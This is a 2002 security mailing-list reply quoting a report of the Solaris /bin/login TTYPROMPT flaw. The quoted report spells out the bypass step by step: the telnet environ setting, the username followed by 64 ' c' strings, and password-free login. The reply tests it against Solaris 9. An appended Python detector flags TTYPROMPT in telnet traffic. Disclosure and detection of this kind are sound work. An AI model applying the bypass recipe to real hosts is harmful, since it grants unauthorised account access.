From: Ido Dubrawsky (idubraws_at_cisco.com)
Date: Wed Oct 02 2002 - 14:16:28 CDT

    On Wed, Oct 02, 2002 at 12:13:09PM -0400, Jonathan S wrote:
    > Hello,
    >
    > Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
    > environment variable TTYPROMPT. This vulnerability has already been
    > reported to BugTraq and a patch has been released by Sun.
    > However, a very simple exploit, which does not require any code to be
    > compiled by an attacker, exists. The exploit requires the attacker to
    > simply define the environment variable TTYPROMPT to a 6 character string,
    > inside telnet. I believe this overflows an integer inside login, which
    > specifies whether or not the user has been authenticated (just a guess).
    > Once connected to the remote host, you must type the username, followed by
    > 64 " c"s, and a literal "\n". You will then be logged in as the user
    > without any password authentication. This should work with any account
    > except root (unless remote root login is allowed).
    >
    Looks like Solaris 9 is not vulnerable to this:

    [idubraws@elrond idubraws]
    6 $ telnet
    telnet> environ define TTYPROMPT abcdef
    telnet> o 192.168.155.2
    Trying 192.168.155.2...
    Connected to 192.168.155.2.
    Escape character is '^]'.

    SunOS 5.9

    login:

    It automatically drops you to the login prompt. Perhaps this is fixed by a
    patch that got rolled into 9?

    Ido

    -- 
    ===============================================================================
         			|Ido Dubrawsky		     E-mail: idubraws@cisco.com
         |          |	|Network Consulting Engineer
        :|:        :|:	|VSEC Technical Marketing, SAFE Architecture
       :|||:      :|||:	|Cisco Systems, Inc.
    .:|||||||:..:|||||||:.	|Austin, TX. 78759
    ===============================================================================
    

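As an added example (not part of the original message or thread), one way a defender could spot TTYPROMPT being pushed to a server is to parse the Telnet NEW-ENVIRON subnegotiation (RFC 1572), the mechanism behind the `environ define` line in the session above. Function names and sample bytes are constructed for illustration; only option 39 is handled, so the older ENVIRON option (36) is out of scope.

```python
IAC, SB, SE, WILL = 255, 250, 240, 251
NEW_ENVIRON = 39                      # Telnet option number, RFC 1572
IS, INFO = 0, 2                       # subnegotiation commands carrying values
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3

def subnegotiations(stream: bytes):
    """Yield (option, payload) for each IAC SB ... IAC SE, unescaping IAC IAC."""
    i = 0
    while i < len(stream) - 2:
        if stream[i] == IAC and stream[i + 1] == SB:
            option, payload, j = stream[i + 2], bytearray(), i + 3
            while j < len(stream) - 1:
                if stream[j] == IAC:
                    if stream[j + 1] == SE:
                        yield option, bytes(payload)
                        break
                    j += 1            # IAC IAC encodes a literal 0xFF
                payload.append(stream[j])
                j += 1
            i = j + 2
        elif stream[i] == IAC and stream[i + 1] == IAC:
            i += 2                    # escaped data byte, not a command
        else:
            i += 1

def environ_vars(payload: bytes) -> dict:
    """Decode an IS/INFO payload into {name: value}, honouring ESC."""
    if not payload or payload[0] not in (IS, INFO):
        return {}
    pairs, cur, k = [], None, 1
    while k < len(payload):
        b = payload[k]
        if b in (VAR, USERVAR):
            pairs.append([bytearray(), bytearray()])
            cur = pairs[-1][0]
        elif b == VALUE and pairs:
            cur = pairs[-1][1]
        elif cur is not None:
            if b == ESC and k + 1 < len(payload):
                k += 1
                b = payload[k]        # escaped byte is taken literally
            cur.append(b)
        k += 1
    return {bytes(n).decode("latin-1"): bytes(v).decode("latin-1") for n, v in pairs}

def ttyprompt_alerts(stream: bytes) -> list:
    """Return every TTYPROMPT value a client offered in the stream."""
    return [v for opt, p in subnegotiations(stream) if opt == NEW_ENVIRON
            for n, v in environ_vars(p).items() if n == "TTYPROMPT"]

# Constructed client-to-server bytes, modelled on the telnet session above.
SAMPLE = (bytes([IAC, WILL, NEW_ENVIRON, IAC, SB, NEW_ENVIRON, IS, USERVAR])
          + b"TTYPROMPT" + bytes([VALUE]) + b"abcdef" + bytes([IAC, SE]))
```

A non-empty result from `ttyprompt_alerts` on traffic to a telnet service is worth logging regardless of the server's patch level, since ordinary clients have no reason to send this variable.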